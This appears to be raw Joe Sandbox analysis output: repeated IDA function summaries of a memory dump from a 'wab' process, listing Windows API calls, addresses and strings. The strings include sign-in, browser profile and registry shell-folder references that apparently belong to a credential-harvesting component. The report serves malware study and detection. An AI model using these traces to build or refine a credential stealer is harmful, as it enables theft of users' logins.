                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 59245283-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                                                                                • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                                                                • GetLastError.KERNEL32 ref: 0041855C
                                                                                                                • Sleep.KERNEL32(00000064), ref: 00418571
                                                                                                                • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                                                                                • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                                                                • GetLastError.KERNEL32 ref: 0041858E
                                                                                                                • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004185AC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$AttributesDeleteErrorLastSleep$??3@
                                                                                                                • String ID:
                                                                                                                • API String ID: 3467550082-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy
                                                                                                                • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                • API String ID: 3510742995-3273207271
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                                                                                • memset.MSVCRT ref: 00413ADC
                                                                                                                • memset.MSVCRT ref: 00413AEC
                                                                                                                  • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                                                • memset.MSVCRT ref: 00413BD7
                                                                                                                • wcscpy.MSVCRT ref: 00413BF8
                                                                                                                • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                • String ID: 3A
                                                                                                                • API String ID: 3300951397-293699754
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                  • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                                  • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                                • wcslen.MSVCRT ref: 0040D1D3
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                • memcpy.MSVCRT ref: 0040D24C
                                                                                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                                                                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                                                                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                                                                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                • String ID: strings
                                                                                                                • API String ID: 3166385802-3030018805
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00411AF6
                                                                                                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                • wcsrchr.MSVCRT ref: 00411B14
                                                                                                                • wcscat.MSVCRT ref: 00411B2E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                                • String ID: AE$.cfg$General$EA
                                                                                                                • API String ID: 776488737-1622828088
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0040D8BD
                                                                                                                • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                                                • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                                                • memset.MSVCRT ref: 0040D906
                                                                                                                • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                                                • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                                                  • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                                                  • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                • String ID: sysdatetimepick32
                                                                                                                • API String ID: 1028950076-4169760276
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy$memset
                                                                                                                • String ID: -journal$-wal
                                                                                                                • API String ID: 438689982-2894717839
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                                                • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                                                • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                                                  • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                                                  • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                                                • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                                                • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Item$Dialog$MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 3975816621-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • _wcsicmp.MSVCRT ref: 00444D09
                                                                                                                • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                                                • _wcsicmp.MSVCRT ref: 00444D33
                                                                                                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                  • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcsicmp$wcslen$_memicmp
                                                                                                                • String ID: .save$http://$https://$log profile$signIn
                                                                                                                • API String ID: 1214746602-2708368587
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 2313361498-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetClientRect.USER32(?,?), ref: 00405F65
                                                                                                                • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                                                • GetWindow.USER32(00000000), ref: 00405F80
                                                                                                                  • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                                                • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                                                • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                                                • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                                                • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                                                                • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$ItemMessageRectSend$Client
                                                                                                                • String ID:
                                                                                                                • API String ID: 2047574939-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                                • String ID:
                                                                                                                • API String ID: 4218492932-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                                  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                                  • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A75D
                                                                                                                  • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A7AA
                                                                                                                • memcpy.MSVCRT ref: 0044A8BF
                                                                                                                • memcpy.MSVCRT ref: 0044A90C
                                                                                                                • memcpy.MSVCRT ref: 0044A988
                                                                                                                  • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A422
                                                                                                                  • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A46E
                                                                                                                • memcpy.MSVCRT ref: 0044A9D8
                                                                                                                • memcpy.MSVCRT ref: 0044AA19
                                                                                                                • memcpy.MSVCRT ref: 0044AA4A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy$memset
                                                                                                                • String ID: gj
                                                                                                                • API String ID: 438689982-4203073231
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy
                                                                                                                • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                                                                • API String ID: 3510742995-2446657581
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                                                • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                                                • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                                                • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                                                • memset.MSVCRT ref: 00405ABB
                                                                                                                • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                                                • SetFocus.USER32(?), ref: 00405B76
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$FocusItemmemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 4281309102-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintfwcscat
                                                                                                                • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                • API String ID: 384018552-4153097237
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                • String ID: 0$6
                                                                                                                • API String ID: 2029023288-3849865405
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                                                • memset.MSVCRT ref: 00405455
                                                                                                                • memset.MSVCRT ref: 0040546C
                                                                                                                • memset.MSVCRT ref: 00405483
                                                                                                                • memcpy.MSVCRT ref: 00405498
                                                                                                                • memcpy.MSVCRT ref: 004054AD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$memcpy$ErrorLast
                                                                                                                • String ID: 6$\
                                                                                                                • API String ID: 404372293-1284684873
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                                • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                                • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                                • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                                • wcscat.MSVCRT ref: 0040A0E6
                                                                                                                • wcscat.MSVCRT ref: 0040A0F5
                                                                                                                • wcscpy.MSVCRT ref: 0040A107
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                • String ID:
                                                                                                                • API String ID: 1331804452-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                • String ID: advapi32.dll
                                                                                                                • API String ID: 2012295524-4050573280
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                                • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                                • <%s>, xrefs: 004100A6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$_snwprintf
                                                                                                                • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                • API String ID: 3473751417-2880344631
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wcscat$_snwprintfmemset
                                                                                                                • String ID: %2.2X
                                                                                                                • API String ID: 2521778956-791839006
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintfwcscpy
                                                                                                                • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                • API String ID: 999028693-502967061
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy$memsetstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2350177629-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset
                                                                                                                • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                                • API String ID: 2221118986-1606337402
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 265355444-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                                                                                  • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                                                                                  • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                  • Part of subcall function 0040A9CE: ??3@YAXPAX@Z.MSVCRT ref: 0040A9DD
                                                                                                                • memset.MSVCRT ref: 0040C439
                                                                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                • _wcsupr.MSVCRT ref: 0040C481
                                                                                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                                                                • memset.MSVCRT ref: 0040C4D0
                                                                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??3@$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1973883786-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004116FF
                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                  • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                                                                                  • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                • API String ID: 2618321458-3614832568
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004185FC
                                                                                                                • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041860A
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00418650
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??3@AttributesFilememset
                                                                                                                • String ID:
                                                                                                                • API String ID: 776155459-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                                • malloc.MSVCRT ref: 00417524
                                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00417544
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00417562
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
